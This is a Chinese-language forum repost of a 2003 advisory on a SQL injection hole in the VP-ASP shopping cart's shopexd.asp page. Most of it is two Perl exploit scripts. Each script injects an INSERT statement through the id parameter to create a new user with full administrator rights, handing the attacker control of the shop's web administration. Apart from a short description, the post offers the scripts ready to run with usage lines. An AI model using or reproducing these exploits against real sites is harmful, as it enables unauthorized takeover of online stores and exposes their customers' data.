- 主题
- 0
- 积分
- 0
- 贝壳
- 0 个
- 注册时间
- 2007-2-1
- 最后登录
- 2007-2-1
|
[转帖] VPASP SQL漏洞及利用代码
VPASP SQL漏洞及利用代码
Joker@safechina.net
www.safechina.net
日期: 05/07/2003
平台: Win32/MSSQL
级别: 高
BUG类型: SQL入侵
发现者: AresU & TioEuy
厂商网址: http://www.vpasp.com/
介绍:
VP-ASP是一个应用于超过70个国家,功能强大的电子商务解决方案
VP-ASP的特点是使用方便和强大的无限制的客户定制功能
更深入的了解请看http://www.vpasp.com itself.
细节:
当我们阅读vpasp的源代码时,我们在shopexd.asp发现一个漏洞.利用这个漏洞并不难.
以管理员权限添加一个新用户即可获得Web界面管理的全部权限.
Exploits/POC:(用/usr/bin/perl -w 运行)
《Code 1》
$pamer = "
use LWP::UserAgent; # LWP Mode sorry im lazy :)
use HTTP::Request;
use HTTP::Response;
$│ = 1;
print $pamer;
if ($#ARGV<3){
print "\n Usage: perl tio-fux.pl
\n\n";
exit;
}
my $biji =
"1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,
29";
$tio = "$ARGV[0]/shopexd.asp?id=$ARGV[1]";
$tio .= ";insert into tbluser
(\"fldusername\",\"fldpassword\",\"fldaccess\") ";
$tio .= "values ('$ARGV[2]','$ARGV[3]','$biji')--";
my $bosen = LWP::UserAgent->new();
my $gembel = HTTP::Request->new(GET => $tio);
my $dodol = $bosen->request($gembel);
if ($dodol->is_error()) {
printf " s\n", $dodol->status_line;
} else {
print "Tuing !\n";
}
print "\n680165\n";
--END--
《Code 2》
--------
#!/usr/bin/perl
# ==============================
# VP-ASP Shopping Cart - Exploit
use Socket;
$dodolbasik = "tioeuy.pl, VPASP exploit by TioEuy&AresU ";
$aksesnya
="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
,29";
$pieldnya = '"fldusername","fldpassword","fldaccess"';
if ($#ARGV<4)
{
print "\n$dodolbasik";
print "\n\n Usage: perl tioeuy.pl
\n\n";
exit;
}
$kupret="$ARGV[1]shopexd.asp?id=$ARGV[2];insert into tbluser
($pieldnya)
values ('$ARGV[3]','$ARGV[4]','$aksesnya')--";
$kupret=~s/\ /20/g;
$kupret="GET $kupret HTTP/1.0\r\nHost: $ARGV[0]\r\n\r\n";
print $kupret;
$port=80;
$host=$ARGV[0];
$target = inet_aton($host);
@hasil=sendraw($kupret);
print $gembel;
print @hasil;
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')││0) ││
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $│=1; print $pstr;
while(){ push @in, $_;}
select(STDOUT); close(S); return @in;
}
}
--END--
|
|
